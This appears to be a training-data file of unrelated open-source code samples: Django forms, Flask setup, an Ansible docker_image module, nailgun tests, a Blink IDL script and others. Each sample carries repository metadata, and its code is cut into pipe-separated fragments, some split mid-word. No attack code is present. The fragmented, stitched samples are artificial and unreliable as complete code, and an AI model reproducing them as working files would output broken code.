        # Provide an association between the ModelForm and a model
        model = Page
        fields = ('title', 'url', 'views')

    def clean(self):
        """Prepend 'http://' when the user omitted a scheme.

        Bug fix: the original only tested for 'http://', so a valid
        'https://...' URL was mangled into 'http://https://...'.
        Both schemes are now left untouched.
        """
        cleaned_data = self.cleaned_data
        url = cleaned_data.get('url')
        if url and not url.startswith(('http://', 'https://')):
            url = 'http://' + url
            cleaned_data['url'] = url
        return cleaned_data
class UserForm(forms.ModelForm):
    """Registration form for the built-in User model."""

    # PasswordInput masks the password in the rendered form.
    password = forms.CharField(widget=forms.PasswordInput())

    class Meta:
        model = User
        fields = ('username', 'email', 'password')
    # NOTE(review): this form stores the password exactly as submitted; the
    # view must hash it (user.set_password) before saving. Confirm call site.
class UserProfileForm(forms.ModelForm):
    """Form for the extra profile fields attached to a User."""

    class Meta:
        model = UserProfile
        # Only user-editable fields; the user link itself is set by the view.
        fields = ('website', 'picture')
|
gitgitcode/myflask
|
maomew/__init__.py
|
Python
|
mit
| 219
| 0.004566
|
#!/usr/bin/env python
from flask import Flask

# instance_relative_config makes from_pyfile() resolve relative to the
# instance/ folder (kept out of version control).
app = Flask(__name__, instance_relative_config=True)
# Base defaults shipped with the package.
app.config.from_object('config.default')
# Instance-specific overrides (instance/config.py), e.g. secret keys.
app.config.from_pyfile('config.py')
# NOTE(review): env-var-selected config file left disabled on purpose?
#app.config.from_envvar('APP_CONFIG_FILE')
|
mamchecker/mamchecker
|
mamchecker/done/__init__.py
|
Python
|
gpl-3.0
| 3,545
| 0.001975
|
# -*- coding: utf-8 -*-
import re
import datetime
import logging
from urlparse import parse_qsl
from mamchecker.model import depth_1st, problemCtxObjs, keysOmit, table_entry, ctxkey
from mamchecker.hlp import datefmt, last
from mamchecker.util import PageBase
from google.appengine.ext import ndb
def prepare(
        qs,  # url query_string (after ?)
        skey,  # start key; the filter is filled up with it.
        # Student key normally, but can be another level, e.g. school, too.
        # If a parent belongs to the user, then all children can be queried.
        userkey):
    '''prepares the parameters for depth_1st

    >>> #see depth_1st
    >>> skey = ctxkey(['Sc1', 'Pe1', 'Te1','Cl1','St1'])
    >>> #qs= "Sc0&*&*&*&*&*"
    >>> qs= "q~r.be"
    >>> prepare(qs,skey,None)[0]
    ['Sc1', 'Pe1', 'Te1', 'Cl1', 'St1', [('query_string', '=', 'r.be')]]
    >>> qs= ' '
    >>> prepare(qs,skey,None)[0]
    ['Sc1', 'Pe1', 'Te1', 'Cl1', 'St1', []]
    >>> qs= "1DK&*&d>3"
    >>> p = prepare(qs,skey,None)[0]
    '''
    @last
    def filters(x):
        '''convert to GAE filters from
        lst is ["<field><operator><value>",...]
        ~ -> =
        q = query_string
        age fields: H = hours, S = seconds, M = minutes, d = days
        '''
        AGES = {'d': 'days', 'H': 'hours', 'M': 'minutes', 'S': 'seconds'}
        ABBR = {'q': 'query_string'}
        # NOTE(review): this local list shadows the function's own name.
        filters = []
        # Non-string input (e.g. the [] placeholder) produces None,
        # which the caller uses to keep the original value.
        if not isinstance(x, str):
            return
        for le in x.split(','):
            le = le.replace('~', '=')
            match = re.match(r'(\w+)([=!<>]+)([\w\d\.]+)', le)
            if match:
                grps = match.groups()
                name, op, value = grps
                if name in ABBR:
                    name = ABBR[name]
                age = None
                # le='d<~3'
                if name in AGES:
                    age = AGES[name]
                if name in AGES.values():
                    age = name
                # Age filters translate to a cutoff on the 'answered' datetime.
                if age:
                    value = datetime.datetime.now(
                    ) - datetime.timedelta(**{age: int(value)})
                    name = 'answered'
                filters.append((name, op, value))
        return filters
    O = problemCtxObjs
    # q=query, qq=*->[], qqf=filter->gae filter (name,op,value)
    q = filter(None, [k.strip() for k, v in parse_qsl(qs, True)])
    qq = [[] if x == '*' else x for x in q]
    # NOTE(review): relies on the @last decorator — filters() with no
    # argument presumably returns the previous call's result. Confirm in hlp.
    qqf = [filters() if filters(x) else x for x in qq]
    # fill up to len(O) by prefixing levels taken from the start key
    delta = len(O) - len(qqf)
    if delta > 0:
        ext = [str(v) for k, v in skey.pairs()]
        extpart = min(len(ext), delta)
        rest = delta - extpart
        qqf = ext[:extpart] + [[]] * rest + qqf
    keys = keysOmit(qqf)
    obj = keys and keys[-1].get()  # parent to start from
    # NOTE(review): the two branches return tuples of different lengths
    # (4 vs 5); callers unpack via depth_1st(*prepare(...)) — confirm that
    # depth_1st accepts both arities.
    if obj and obj.userkey == userkey:
        return qqf, keys, O, True
    else:
        return qqf, [], O, False, userkey
class Page(PageBase):
    """Request handler rendering the 'done' table of answered problems."""

    def __init__(self, _request):
        # Bug fix: the original used super(self.__class__, self), which
        # recurses infinitely as soon as this class is subclassed — name
        # the class explicitly instead (Python 2 style, as in this file).
        super(Page, self).__init__(_request)
        # Deferred: the template invokes table() to build the rows on demand.
        self.table = lambda: depth_1st(
            *
            prepare(
                self.request.query_string,
                self.request.student.key,
                self.user and self.user.key))
        self.params = {
            'table': self.table,
            'table_entry': table_entry}

    def post_response(self):
        """Delete every submitted 'deletee' entry, then render as for GET."""
        for urlsafe in self.request.get_all('deletee'):
            k = ndb.Key(urlsafe=urlsafe)
            k.delete()
        return self.get_response()
|
ColOfAbRiX/ansible
|
lib/ansible/modules/cloud/docker/docker_image.py
|
Python
|
gpl-3.0
| 21,614
| 0.003007
|
#!/usr/bin/python
#
# Copyright 2016 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Module metadata consumed by ansible-doc and the Ansible build tooling.
ANSIBLE_METADATA = {'status': ['preview'],
                    'supported_by': 'committer',
                    'version': '1.0'}
DOCUMENTATION = '''
---
module: docker_image
short_description: Manage docker images.
version_added: "1.5"
description:
- Build, load or pull an image, making the image available for creating containers. Also supports tagging an
image into a repository and archiving an image to a .tar file.
options:
archive_path:
description:
- Use with state C(present) to archive an image to a .tar file.
required: false
version_added: "2.1"
load_path:
description:
- Use with state C(present) to load an image from a .tar file.
required: false
version_added: "2.2"
dockerfile:
description:
- Use with state C(present) to provide an alternate name for the Dockerfile to use when building an image.
default: Dockerfile
required: false
version_added: "2.0"
force:
description:
- Use with state I(absent) to un-tag and remove all images matching the specified name. Use with state
C(present) to build, load or pull an image when the image already exists.
default: false
required: false
version_added: "2.1"
http_timeout:
description:
- Timeout for HTTP requests during the image build operation. Provide a positive integer value for the number of
seconds.
required: false
version_added: "2.1"
name:
description:
- "Image name. Name format will be one of: name, repository/name, registry_server:port/name.
When pushing or pulling an image the name can optionally include the tag by appending ':tag_name'."
required: true
path:
description:
- Use with state 'present' to build an image. Will be the path to a directory containing the context and
Dockerfile for building an image.
aliases:
- build_path
required: false
pull:
description:
- When building an image downloads any updates to the FROM image in Dockerfile.
default: true
required: false
version_added: "2.1"
push:
description:
- Push the image to the registry. Specify the registry as part of the I(name) or I(repository) parameter.
default: false
required: false
version_added: "2.2"
rm:
description:
- Remove intermediate containers after build.
default: true
required: false
version_added: "2.1"
nocache:
description:
- Do not use cache when building an image.
default: false
required: false
repository:
description:
- Full path to a repository. Use with state C(present) to tag the image into the repository. Expects
format I(repository:tag). If no tag is provided, will use the value of the C(tag) parameter or I(latest).
required: false
version_added: "2.1"
state:
description:
- Make assertions about the state of an image.
- When C(absent) an image will be removed. Use the force option to un-tag and remove all images
matching the provided name.
- When C(present) check if an image exists using the provided name and tag. If the image is not found or the
force option is used, the image will either be pulled, built or loaded. By default the image will be pulled
from Docker Hub. To build the image, provide a path value set to a directory containing a context and
Dockerfile. To load an image, specify load_path to provide a path to an archive file. To tag an image to a
repository, provide a repository path. If the name contains a repository path, it will be pushed.
- "NOTE: C(build) is DEPRECATED and will be removed in release 2.3. Specifying C(build) will behave the
same as C(present)."
required: false
default: present
choices:
- absent
- present
- build
tag:
descri
|
ption:
- Used to select an image when pulling. Will be added to the image when pushing, tagging or building. Defaults to
I(latest).
- If C(
|
name) parameter format is I(name:tag), then tag value from C(name) will take precedence.
default: latest
required: false
buildargs:
description:
- Provide a dictionary of C(key:value) build arguments that map to Dockerfile ARG directive.
- Docker expects the value to be a string. For convenience any non-string values will be converted to strings.
- Requires Docker API >= 1.21 and docker-py >= 1.7.0.
type: complex
required: false
version_added: "2.2"
container_limits:
description:
- A dictionary of limits applied to each container created by the build process.
required: false
version_added: "2.1"
type: complex
contains:
memory:
description: Set memory limit for build
type: int
memswap:
description: Total memory (memory + swap), -1 to disable swap
type: int
cpushares:
description: CPU shares (relative weight)
type: int
cpusetcpus:
description: CPUs in which to allow execution, e.g., "0-3", "0,1"
type: str
use_tls:
description:
- "DEPRECATED. Whether to use tls to connect to the docker server. Set to C(no) when TLS will not be used. Set to
C(encrypt) to use TLS. And set to C(verify) to use TLS and verify that the server's certificate is valid for the
server. NOTE: If you specify this option, it will set the value of the tls or tls_verify parameters."
choices:
- no
- encrypt
- verify
default: no
required: false
version_added: "2.0"
extends_documentation_fragment:
- docker
requirements:
- "python >= 2.6"
- "docker-py >= 1.7.0"
- "Docker API >= 1.20"
authors:
- Pavel Antonov (@softzilla)
- Chris Houseknecht (@chouseknecht)
- James Tanner (@jctanner)
'''
EXAMPLES = '''
- name: pull an image
docker_image:
name: pacur/centos-7
- name: Tag and push to docker hub
docker_image:
name: pacur/centos-7
repository: dcoppenhagan/myimage
tag: 7.0
push: yes
- name: Tag and push to local registry
docker_image:
name: centos
repository: localhost:5000/centos
tag: 7
push: yes
- name: Remove image
docker_image:
state: absent
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
- name: Build an image and push it to a private repo
docker_image:
path: ./sinatra
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
push: yes
- name: Archive image
docker_image:
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
archive_path: my_sinatra.tar
- name: Load image from archive and push to a private registry
docker_image:
name: localhost:5000/myimages/sinatra
tag: v1
push: yes
load_path: my_sinatra.tar
- name: Build image and with buildargs
docker_image:
path: /path/to/build/dir
name: myimage
buildargs:
log_volume: /var/log/myapp
listen_port: 8080
'''
RETURN = '''
image:
description: Image inspection results for the affected image.
returned: success
type: complex
sample: {}
'''
from ansible.module_utils.docker_common import *
try:
from docker.auth.auth import resolve_repository_name
from docker.utils.utils import parse_repository_tag
except ImportError:
# missing docker-py handled in docker_common
pass
class ImageManager(DockerBaseClass):
def __init__(self, c
|
openstack/tacker
|
tacker/common/constants.py
|
Python
|
apache-2.0
| 813
| 0
|
# Copyright (c) 2012 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the Lice
|
nse.
|
# TODO(salv-orlando): Verify if a single set of operational
# status constants is achievable

# Valid 802.1Q VLAN tag range (0 and 4095 are reserved by the standard).
MAX_VLAN_TAG = 4094
MIN_VLAN_TAG = 1

# Sentinel page size meaning "no pagination limit".
PAGINATION_INFINITE = 'infinite'

# Sort-direction tokens accepted by list APIs.
SORT_DIRECTION_ASC = 'asc'
SORT_DIRECTION_DESC = 'desc'
|
tykling/tykurllog
|
src/tykurllog/admin.py
|
Python
|
bsd-3-clause
| 204
| 0.009804
|
from django.contrib import admin
from django.apps import apps

### register all models in this app in the admin
# Iterate every model declared by the 'tykurllog' app config and register
# it with the default admin site so each gets an auto-generated CRUD UI.
for model in apps.get_app_config('tykurllog').get_models():
    admin.site.register(model)
|
prmtl/fuel-web
|
nailgun/nailgun/test/unit/test_objects.py
|
Python
|
apache-2.0
| 27,637
| 0
|
# -*- coding: utf-8 -*-
# Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import hashlib
import jsonschema
import six
import uuid
from itertools import cycle
from itertools import ifilter
from oslo.serialization import jsonutils
from nailgun.test.base import BaseIntegrationTest
from nailgun.test.base import BaseTestCase
from nailgun.utils import reverse
from nailgun.errors import errors
from nailgun import consts
from nailgun.db import NoCacheQuery
from nailgun.db.sqlalchemy.models import NodeBondInterface
from nailgun.db.sqlalchemy.models import Task
from nailgun.network.manager import NetworkManager
from nailgun.network.neutron import NeutronManager
from nailgun.network.neutron import NeutronManager70
from nailgun import objects
class TestObjects(BaseIntegrationTest):
    """Checks ReleaseCollection.filter_by / filter_by_not on both accepted
    input kinds: a DB query (returns NoCacheQuery) and a plain iterable
    (returns itertools.ifilter)."""

    def test_filter_by(self):
        names = cycle('ABCD')
        os = cycle(['CentOS', 'Ubuntu'])
        # 12 releases over a 4-name x 2-OS cycle -> exactly 3 (A, CentOS) rows.
        for i in xrange(12):
            self.env.create_release(
                name=names.next(),
                operating_system=os.next()
            )
        # filtering query - returns query
        query_filtered = objects.ReleaseCollection.filter_by(
            objects.ReleaseCollection.all(),
            name="A",
            operating_system="CentOS"
        )
        self.assertIsInstance(query_filtered, NoCacheQuery)
        self.assertEqual(
            objects.ReleaseCollection.count(query_filtered),
            3
        )
        for r in query_filtered:
            self.assertEqual(r.name, "A")
            self.assertEqual(r.operating_system, "CentOS")
        # filtering iterable - returns ifilter
        iterable_filtered = objects.ReleaseCollection.filter_by(
            list(objects.ReleaseCollection.all()),
            name="A",
            operating_system="CentOS"
        )
        self.assertIsInstance(iterable_filtered, ifilter)
        self.assertEqual(
            objects.ReleaseCollection.count(iterable_filtered),
            3
        )
        for r in iterable_filtered:
            self.assertEqual(r.name, "A")
            self.assertEqual(r.operating_system, "CentOS")
        # Degenerate case: filtering an empty iterable yields nothing.
        iterable_filtered = objects.ReleaseCollection.filter_by(
            list(),
            name="A",
        )
        self.assertIsInstance(iterable_filtered, ifilter)
        self.assertEquals(0, len(list(iterable_filtered)))

    def test_filter_by_not(self):
        names = cycle('ABCDE')
        os = cycle(['CentOS', 'Ubuntu'])
        # create releases: we'll have only two releases with both
        # name A and operating_system CentOS
        for i in xrange(12):
            self.env.create_release(
                name=names.next(),
                operating_system=os.next()
            )
        # filtering query - returns query
        query_filtered = objects.ReleaseCollection.filter_by_not(
            objects.ReleaseCollection.all(),
            name="A",
            operating_system="CentOS"
        )
        self.assertIsInstance(query_filtered, NoCacheQuery)
        self.assertEqual(
            objects.ReleaseCollection.count(query_filtered),
            10
        )
        # Surviving rows must not match BOTH excluded attributes at once.
        for r in query_filtered:
            if r.name == "A":
                self.assertNotEqual(r.operating_system, "CentOS")
            elif r.operating_system == "CentOS":
                self.assertNotEqual(r.name, "A")
        # filtering iterable - returns ifilter
        iterable_filtered = objects.ReleaseCollection.filter_by_not(
            list(objects.ReleaseCollection.all()),
            name="A",
            operating_system="CentOS"
        )
        self.assertIsInstance(iterable_filtered, ifilter)
        self.assertEqual(
            objects.ReleaseCollection.count(iterable_filtered),
            10
        )
        for r in iterable_filtered:
            if r.name == "A":
                self.assertNotEqual(r.operating_system, "CentOS")
            elif r.operating_system == "CentOS":
                self.assertNotEqual(r.name, "A")
class TestNodeObject(BaseIntegrationTest):
def test_adding_to_cluster_kernel_params_centos(self):
self.env.create(
release_kwargs={
"operating_system": consts.RELEASE_OS.centos
},
cluster_kwargs={},
nodes_kwargs=[
{"role": "controller"}
]
)
node_db = self.env.nodes[0]
self.assertEqual(
objects.Node.get_kernel_params(node_db),
(
'console=ttyS0,9600 '
'console=tty0 '
'biosdevname=0 '
'crashkernel=none '
'rootdelay=90 '
'nomodeset'
)
)
def test_adding_to_cluster_kernel_params_ubuntu(self):
self.env.create(
release_kwargs={
"operating_system": consts.RELEASE_OS.ubuntu,
"attributes_metadata": {
"editable": {
"kernel_params": {
"kernel": {
"value": (
"console=ttyS0,9600 "
"console=tty0 "
"rootdelay=90 "
"nomodeset"
)
}
}
}
}
},
cluster_kwargs={},
nodes_kwargs=[
{"role": "controller"}
]
)
node_db = self.env.nodes[0]
self.assertEqual(
objects.Node.get_kernel_params(node_db),
(
'console=ttyS0,9600 '
'console=tty0 '
'rootdelay=90 '
'nomodeset'
)
)
def test_get_kernel_params_overwriten(self):
"""Test verifies that overwriten kernel params will be returned."""
self.env.create(
nodes_kwargs=[
{"role": "controller"}
])
additional_kernel_params = 'intel_iommu=true'
default_kernel_params = objects.Cluster.get_default_kernel_params(
self.env.clusters[0])
kernel_params = '{0} {1}'.format(default_kernel_params,
additional_kernel_params)
self.env.nodes[0].kernel_params = kernel_params
self.assertNotEqual(
objects.Node.get_kernel_params(self.env.nodes[0]),
default_kernel_params)
self.assertEqual(
objects.Node.get_kernel_params(self.env.nodes[0]),
kernel_params)
def test_should_have_public(self):
nodes = [
|
{'roles': ['controller', 'cinder'], 'pending_addition': True},
{'roles': ['compute', 'cinder'], 'pending_addition': True},
{'roles
|
': ['compute'], 'pending_addition': True},
{'roles': ['mongo'], 'pending_addition': True},
{'roles': [], 'pending_roles': ['cinder'],
'pending_addition': True},
{'roles': [], 'pending_roles': ['controller'],
'pending_addition': True}]
self.env.create(
cluster_kwargs={
'net_provider': 'neutron'},
nodes_kwargs=nodes)
cluster = self.env.clusters[0]
cluster.release.roles_metadata['mongo']['public_ip_required'] = True
attrs = cluster.attributes.editable
self.assertEqual(
attrs['public_network_assignment']['assign_to_all_nodes']['value'],
|
jocke-l/blues
|
blues/redis.py
|
Python
|
mit
| 1,054
| 0.000949
|
"""
Redis Blueprint
===============
**
|
Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.redis
settings:
redis:
# bind: 0.0.0.0 # Set the bind address specifically (Default: 127.0.0.1)
"""
from fabric.decorators import task
from refabric.context_managers import sudo
from refabric.contrib import blueprints
from . import debian
__all__ = ['start', 'stop', 'restart', 'setup',
|
'configure']
# Blueprint handle: reads this module's settings from the Fabric env.
blueprint = blueprints.get(__name__)

# Fabric tasks controlling the Debian 'redis-server' service.
start = debian.service_task('redis-server', 'start')
stop = debian.service_task('redis-server', 'stop')
restart = debian.service_task('redis-server', 'restart')
@task
def setup():
    """
    Install and configure Redis
    """
    # Install first so the package's config layout exists before templating.
    install()
    configure()
def install():
    """Install the redis-server Debian package (needs root)."""
    with sudo():
        debian.apt_get('install', 'redis-server')
@task
def configure():
    """
    Configure Redis

    Renders the blueprint's redis templates into /etc/redis/ and restarts
    the service only when something actually changed.
    """
    context = {
        # Bind address from blueprint settings; default to loopback only.
        'bind': blueprint.get('bind', '127.0.0.1')
    }
    uploads = blueprint.upload('redis', '/etc/redis/', context)
    # NOTE(review): upload() appears to return the changed files, so an
    # empty result skips the restart — confirm against refabric docs.
    if uploads:
        restart()
|
youtube/cobalt
|
third_party/blink/Source/bindings/scripts/compute_interfaces_info_individual.py
|
Python
|
bsd-3-clause
| 17,799
| 0.002472
|
#!/usr/bin/python
#
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Compute global interface information for individual IDL files.
Auxiliary module for compute_interfaces_info_overall, which consolidates
this individual information, computing info that spans multiple files
(dependencies and ancestry).
This distinction is so that individual interface info can be computed
separately for each component (avoiding duplicated reading of individual
files), then consolidated using *only* the info visible to a given component.
Design doc: http://www.chromium.org/developers/design-documents/idl-build
"""
from collections import defaultdict
import optparse
import os
import posixpath
import sys
from idl_compiler import idl_filename_to_interface_name
from idl_definitions import Visitor
from idl_reader import IdlReader
from utilities import idl_filename_to_component
from utilities import idl_filename_to_interface_name
from utilities import merge_dict_recursively
from utilities import read_idl_files_list_from_file
from utilities import shorten_union_name
from utilities import write_pickle_file
module_path = os.path.dirname(__file__)
source_path = os.path.normpath(os.path.join(module_path, os.pardir, os.pardir))
gen_path = os.path.join('gen', 'blink')
class IdlBadFilenameError(Exception):
    """Raised if an IDL filename disagrees with the interface name in the file."""
def parse_options():
    """Parse command-line flags; the two I/O flags are mandatory."""
    parser = optparse.OptionParser(usage='Usage: %prog [options]')
    parser.add_option('--cache-directory', help='cache directory')
    parser.add_option('--idl-files-list', help='file listing IDL files')
    parser.add_option('--dependency-idl-files', help='list of dependency IDL files')
    parser.add_option('--interfaces-info-file', help='interface info pickle file')
    parser.add_option('--component-info-file', help='component wide info pickle file')
    parser.add_option('--root-directory', help='root directory for relative path computation', default=source_path)
    parser.add_option('--extended-attributes', help='file containing whitelist of supported extended attributes')
    options, args = parser.parse_args()
    # Fail fast: nothing can be produced without these two paths.
    if options.interfaces_info_file is None:
        parser.error('Must specify an output file using --interfaces-info-file.')
    if options.idl_files_list is None:
        parser.error('Must specify a file listing IDL files using --idl-files-list.')
    return options, args
################################################################################
# Computations
################################################################################
def relative_dir_posix(idl_filename, base_path):
    """Return the directory of |idl_filename|, relative to |base_path|, in POSIX form."""
    local_dir = os.path.dirname(os.path.relpath(idl_filename, base_path))
    return local_dir.replace(os.path.sep, posixpath.sep)
def include_path(idl_filename, root_path, implemented_as=None):
    """Return the relative POSIX path of the header generated for an IDL file.

    POSIX separators are used regardless of platform for consistency of
    output, so reference tests are platform-independent.
    """
    # The IDL file basename names the C++ class even for partial interface
    # files, unless an explicit implemented_as class name overrides it.
    cpp_class_name = implemented_as or idl_filename_to_interface_name(idl_filename)
    return posixpath.join(relative_dir_posix(idl_filename, root_path),
                          cpp_class_name + '.h')
def get_implements_from_definitions(definitions, definition_name):
    """Partition 'implements' statements by which side |definition_name| is on.

    Returns:
        (left_interfaces, right_interfaces): interfaces appearing opposite
        |definition_name| on each side of an implements statement.

    Raises:
        IdlBadFilenameError: for a statement mentioning neither side, since
        each statement must live in the IDL file of one of its interfaces.
    """
    lefts = []
    rights = []
    for statement in definitions.implements:
        if statement.left_interface == definition_name:
            rights.append(statement.right_interface)
        elif statement.right_interface == definition_name:
            lefts.append(statement.left_interface)
        else:
            raise IdlBadFilenameError(
                'implements statement found in unrelated IDL file.\n'
                'Statement is:\n'
                '    %s implements %s;\n'
                'but filename is unrelated "%s.idl"' %
                (statement.left_interface, statement.right_interface,
                 definition_name))
    return lefts, rights
def get_put_forward_interfaces_from_definition(definition):
    """Return the sorted, de-duplicated target types of [PutForwards] attributes."""
    targets = {attribute.idl_type.base_type
               for attribute in definition.attributes
               if 'PutForwards' in attribute.extended_attributes}
    return sorted(targets)
def get_unforgeable_attributes_from_definition(definition):
    """Return the sorted [Unforgeable] attributes of a definition.

    [Unforgeable] on the interface itself makes every attribute unforgeable;
    otherwise only individually-annotated attributes qualify.
    """
    if 'Unforgeable' in definition.extended_attributes:
        return sorted(definition.attributes)
    return sorted(a for a in definition.attributes
                  if 'Unforgeable' in a.extended_attributes)
def collect_union_types_from_definitions(definitions):
    """Walk |definitions| with a Visitor and return the set of union types used."""

    class UnionTypeCollector(Visitor):
        def collect(self, target):
            self._union_types = set()
            target.accept(self)
            return self._union_types

        def visit_typed_object(self, typed_object):
            # Inspect every IDL-typed attribute of the object and remember
            # any union types it mentions.
            for attribute_name in typed_object.idl_type_attributes:
                typed_attribute = getattr(typed_object, attribute_name, None)
                if not typed_attribute:
                    continue
                for idl_type in typed_attribute.idl_types():
                    if idl_type.is_union_type:
                        self._union_types.add(idl_type)

    return UnionTypeCollector().collect(definitions)
class InterfaceInfoCollector(object):
"""A class that collects interface information from idl files."""
    def __init__(self, root_directory, extend_attributes_filename, cache_directory=None):
        """Set up the IDL reader and empty per-category accumulators.

        Args:
            root_directory: base directory for relative include-path computation.
            extend_attributes_filename: whitelist of supported extended attributes.
            cache_directory: optional directory for the reader's parse cache.
        """
        self.reader = IdlReader(interfaces_info=None, outputdir=cache_directory,
                                extend_attributes_filename=extend_attributes_filename)
        # interface name -> collected info dict
        self.interfaces_info = {}
        # partial interface name -> paths of the files contributing to it
        self.partial_interface_files = defaultdict(lambda: {
            'full_paths': [],
            'include_paths': [],
        })
        self.enumerations = {}
        self.union_types = set()
        self.typedefs = {}
        self.callback_functions = {}
        self.root_path = root_directory
        # Names referenced from partial interfaces; presumably keyed by
        # partial-interface name -- TODO confirm against collect_info().
        self.referenced_from_partial_interfaces = defaultdict(lambda: set())
def add_paths_to_partials_dict(self, partial_interface_name, full_path,
include_paths):
paths_dict = self.partial_interface_files[partial_interface_name]
paths_dict['full_paths'].append(full_path)
paths_dict['include_paths'].extend(include_paths)
def collect_info(s
|
ricklupton/sankeyview
|
floweaver/sankey_definition.py
|
Python
|
mit
| 9,779
| 0.001636
|
from textwrap import dedent
from pprint import pformat
from collections import OrderedDict
import attr
from . import sentinel
from .ordering import Ordering
# adapted from https://stackoverflow.com/a/47663099/1615465
def no_default_vals_in_repr(cls):
    """Class decorator on top of attr.s that omits attributes from repr that
    have their default value"""
    # Snapshot each attribute's default once, at decoration time.  Factory
    # defaults are invoked here to obtain a comparable value; takes_self
    # factories are not supported.
    defaults = OrderedDict()
    for attribute in cls.__attrs_attrs__:
        if isinstance(attribute.default, attr.Factory):
            assert attribute.default.takes_self == False, 'not implemented'
            defaults[attribute.name] = attribute.default.factory()
        else:
            defaults[attribute.name] = attribute.default

    def repr_(self):
        # Mirror attrs' own __repr__ naming: prefer the qualname's leaf so
        # nested classes render sensibly.
        real_cls = self.__class__
        qualname = getattr(real_cls, "__qualname__", None)
        if qualname is not None:
            class_name = qualname.rsplit(">.", 1)[-1]
        else:
            class_name = real_cls.__name__
        attributes = defaults.keys()
        # Only attributes whose current value differs from the default appear.
        return "{0}({1})".format(
            class_name,
            ", ".join(
                name + "=" + repr(getattr(self, name))
                for name in attributes
                if getattr(self, name) != defaults[name]))
    cls.__repr__ = repr_
    return cls
# SankeyDefinition
def _convert_bundles_to_dict(bundles):
if not isinstance(bundles, dict):
bundles = {k: v for k, v in enumerate(bundles)}
return bundles
def _convert_ordering(ordering):
    """Coerce raw layer data into an Ordering; pass an Ordering through unchanged."""
    if not isinstance(ordering, Ordering):
        ordering = Ordering(ordering)
    return ordering
def _validate_bundles(instance, attribute, bundles):
    """attrs validator: every bundle endpoint must be a known node of the
    right kind (ProcessGroup for source/target, Waypoint for waypoints)."""
    for key, bundle in bundles.items():
        if not bundle.from_elsewhere:
            if bundle.source not in instance.nodes:
                raise ValueError('Unknown source "{}" in bundle {}'.format(
                    bundle.source, key))
            if not isinstance(instance.nodes[bundle.source], ProcessGroup):
                raise ValueError(
                    'Source of bundle {} is not a process group'.format(key))
        if not bundle.to_elsewhere:
            if bundle.target not in instance.nodes:
                raise ValueError('Unknown target "{}" in bundle {}'.format(
                    bundle.target, key))
            if not isinstance(instance.nodes[bundle.target], ProcessGroup):
                raise ValueError(
                    'Target of bundle {} is not a process group'.format(key))
        for waypoint in bundle.waypoints:
            if waypoint not in instance.nodes:
                raise ValueError('Unknown waypoint "{}" in bundle {}'.format(
                    waypoint, key))
            if not isinstance(instance.nodes[waypoint], Waypoint):
                raise ValueError(
                    'Waypoint "{}" of bundle {} is not a waypoint'.format(
                        waypoint, key))
def _validate_ordering(instance, attribute, ordering):
for layer_bands in ordering.layers:
for band_nodes in layer_bands:
for u in band_nodes:
if u not in instance.nodes:
raise ValueError('Unknown node "{}" in ordering'.format(u))
@attr.s(slots=True, frozen=True)
class SankeyDefinition(object):
    """Complete specification of a Sankey diagram.

    Attributes
    ----------
    nodes : dict
        Mapping from node id to ProcessGroup or Waypoint.
    bundles : dict or sequence
        Bundles of flows between nodes; sequences are keyed by position.
    ordering : Ordering or nested lists
        Layer/band structure of the diagram.
    flow_selection : str, optional
        Query restricting which flows are included.
    flow_partition : Partition, optional
        How flows are split into separate links.
    time_partition : Partition, optional
        How flows are split over time.
    """
    nodes = attr.ib()
    bundles = attr.ib(converter=_convert_bundles_to_dict,
                      validator=_validate_bundles)
    ordering = attr.ib(converter=_convert_ordering, validator=_validate_ordering)
